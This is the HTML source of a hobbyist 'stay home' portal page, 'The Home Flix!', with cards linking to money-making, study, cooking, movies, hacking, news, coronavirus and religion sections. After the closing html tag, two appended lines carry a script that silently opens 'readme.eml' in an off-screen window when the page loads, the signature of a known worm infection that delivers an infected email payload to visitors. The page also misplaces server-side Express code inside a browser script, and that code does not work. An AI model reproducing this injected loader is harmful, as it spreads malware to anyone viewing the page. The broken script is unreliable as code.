<!DOCTYPE html>
<html>

<title>The Home Flix!</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="stay4.gif" />
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
<style>
* {
  box-sizing: border-box;
}
.menu {
  float: left;
  width: 20%;
}
.menuitem {
  padding: 8px;
  margin-top: 7px;
  border-bottom: 1px solid #f1f1f1;
}
.main {
  float: left;
  width: 60%;
  padding: 0 20px;
  overflow: hidden;
}
.right {
  background-color: lightblue;
  float: left;
  width: 20%;
  padding: 10px 15px;
  margin-top: 7px;
}

@media only screen and (max-width:800px) {
  /* For tablets: */
  .main {
    width: 80%;
    padding: 0;
  }
  .right {
    width: 100%;
  }
}
@media only screen and (max-width:500px) {
  /* For mobile phones: */
  .menu, .main, .right {
    width: 100%;
  }
}
</style>
<style>
body,h1,h2,h3,h4,h5 {font-family: "Poppins", sans-serif}
body {font-size: 16px;}
img {margin-bottom: -8px;}
.mySlides {display: none;}
</style>

<style>
html,body,h1,h2,h3,h4,h5,h6 {font-family: "Roboto", sans-serif;}
.w3-sidebar {
  z-index: 3;
  width: 250px;
  top: 43px;
  bottom: 0;
  height: inherit;
}

</style>
<style>
body,h1,h2,h3,h4,h5 {font-family: "Poppins", sans-serif}
body {font-size: 16px;}
img {margin-bottom: -8px;}
.mySlides {display: none;}
</style>
<!button>
<style>
.contained {
  position: relative;
  width: 90%;
  max-width: 400px;
  margin: 4em auto;
  background: #f36f21;
  border-radius: 20px;
  text-align: center;
  opacity:0.95;
  }
.hoveri {
	background-color: #FFF;
}
  </style>



  <style>
.button {
  display: inline-block;
  border-radius: 15px;
  background-color: #f4511e;
  border: none;
  color: #FFFFFF;
  text-align:center;
  font-size: 28px;
  padding: 20px;
  width: 200px;
  height: 60px;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
}

.button span {
  cursor: pointer;
  display: inline-block;
  position: relative;
  transition: 0.5s;
}

.button span:after {
  content: '\00bb';
  position: absolute;
  opacity: 0;
  top: 0;
  right: -20px;
  transition: 0.5s;
}

.button:hover span {
  padding-right: 25px;
}

.button:hover span:after {
  opacity: 1;
  right: 0;

}
</style>
<!button>



<body background="blur2.jpg">

<div class="w3-display-container" style="margin-bottom:50px">
  <img src="blur4.jpg" style="width:100%">
  <div class="w3-display-bottomleft w3-container w3-amber w3-hover-orange w3-hide-small"
   style="bottom:10%;opacity:0.7;width:100%">
  <h2><b>How To Stay Home Like<br>A Big Boss!</b></h2>
</div>


<!Navbar >
<div class="w3-top w3-bar  w3-black"  >
  <div class="w3-bar w3-theme w3-top w3-left-align w3-large w3-black">
    <a class="w3-bar-item w3-button w3-right w3-hide-large w3-black w3-hover-white w3-large w3-theme-l1" href="javascript:void(0)" onclick="w3_open()"><i class="fa fa-bars"></i></a>

    <a href="iindex.html" class="w3-bar-item w3-black w3-button w3-padding-20 " >Home</a>
    <a href="whatsapp://send?text=https://homeflix9.com/!" data-action="share/whatsapp/share" class="w3-bar-item w3-green w3-button w3-padding-20 " >Share via Whatsapp</a>
    <a href="http://raboninco.com/F77d" class="w3-bar-item w3-black w3-button w3-padding-20 "  target="_blank">Comming-Soon!</a>
    <a href="http://raboninco.com/F77d"class="w3-bar-item w3-red w3-button w3-padding-20 "  target="_blank">Socialize</a>

  </div>
</div>
</div>

<div align="center">
  <img src="skipadd.jpg"style="width:50%;height:20%;">
  <pre>
      <pre>
</div>

<! container 7>
 <div class="w3-col l3 m6 w3-hover-green w3-margin-bottom">
<a href="cashtemple.html">
<div align="center" class="w3-container w3-green">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="money1.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Rich</p>
       </div>
     </div>
   </div>

</a>
   <h2>CASH TEMPLE</h2>
   <p>Learn & Make Money Online!!!</p>

 </div>
   </div>
   </div>
</div>


<! container 2>
 <div class="w3-col l3 m6 w3-hover-blue w3-margin-bottom">
<a href="school.html">
<div align="center" class="w3-container w3-blue">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="school3.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Literate</p>
       </div>
     </div>
   </div>
</a>

   <h2>SCHOOL TIME!!!</h2>
   <p>Study At Home Online+Library !!!</p>
 </div>
   </div>
   </div>
</div>

<! container 5>
 <div class="w3-col l3 m6 w3-hover-yellow w3-margin-bottom">
<a href="cooking.html">
<div align="center" class="w3-container w3-yellow">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="cooking1.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Cookie</p>
       </div>
     </div>
   </div>
</a>

   <h2>COOKING CLASSES</h2>
   <p>Learn cooking & Make Some mess in the Kitchen!</p>
 </div>
   </div>
   </div>
</div>

<! container 4>
 <div class="w3-col l3 m6 w3-hover-purple w3-margin-bottom">
 <a href="movies.html">
<div align="center" class="w3-container w3-purple">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="movies.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Active</p>
       </div>
     </div>
   </div>
</a>

   <h2>MOVIES TIME!!!</h2>
   <p>Watch & Download Movies Allover The World!!!</p>
 </div>
   </div>
   </div>
</div>

<! container 3>
 <div class="w3-col l3 m6 w3-hover-brown w3-margin-bottom">
<a href="bored.html">
<div align="center" class="w3-container w3-brown">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="bored2.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Healthy</p>
       </div>
     </div>
   </div>
</a>

   <h2>I'M BORED!!!</h2>
   <p>Feel bored? Let me show you something...leggo!!!</p>
 </div>
   </div>
   </div>
</div>

<! container 6>
 <div class="w3-col l3 m6 w3-hover-pink w3-margin-bottom">
<a href="hacker.html">
<div align="center" class="w3-container w3-pink">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="hack1.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Cody</p>
       </div>
     </div>
   </div>
</a>

   <h2>HACKING BASEMENT!</h2>
   <p>Discover Deep Secrets Behind Computers...!</p>
 </div>
   </div>
   </div>
</div>

<! container 5>
 <div class="w3-col l3 m6 w3-hover-yellow w3-margin-bottom">
<a href="news.html">
<div align="center" class="w3-container w3-yellow">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="newz.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Updated</p>
       </div>
     </div>
   </div>
</a>

   <h2>WORLD NEWS</h2>
   <p>Watch news and stay updated on global activities!!</p>
 </div>
   </div>
   </div>
</div>


<! container 1>
 <div class="w3-col l3 m6 w3-hover-red w3-margin-bottom">
<a href="corona.html">
<div align="center" class="w3-container w3-red">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="corona2.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Sanitized</p>
       </div>
     </div>
   </div>
</a>

   <h2>CORONA TRENDS!!!</h2>
   <p>Learn About Corona Virus,View Status,Take Action & Stay Safe!!!.</p>
 </div>
   </div>
   </div>
</div>


<! container 8>
 <div class="w3-col l3 m6 w3-hover-orange w3-margin-bottom">
<a href="redemption.html">
<div align="center" class="w3-container w3-orange">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="redemption2.gif" alt="Avatar" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Holy</p>
       </div>
     </div>
   </div>
</a>

   <h2>REDEMPTION</h2>
   <p>Guys,I Guess It's Time We Go Back To God!</p>
 </div>
   </div>
   </div>
</div>


<div align="left">

<script>
var counter = 0;
var app = require("express");
app.get("/",function(req,res){
 counter++;
 res.render("main.ejs",{counter});
});

app.listen(80);
</script>
</div>


<div class="w3-bar w3-tiny w3-black">

    <div class="w3-bar-item">
        </div><div align="center">
        <p id="demo"></p>

<script>
var d = new Date();
document.getElementById("demo").innerHTML = d;
</script>
</div>
    </div>
</div>



</body>
</html>

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 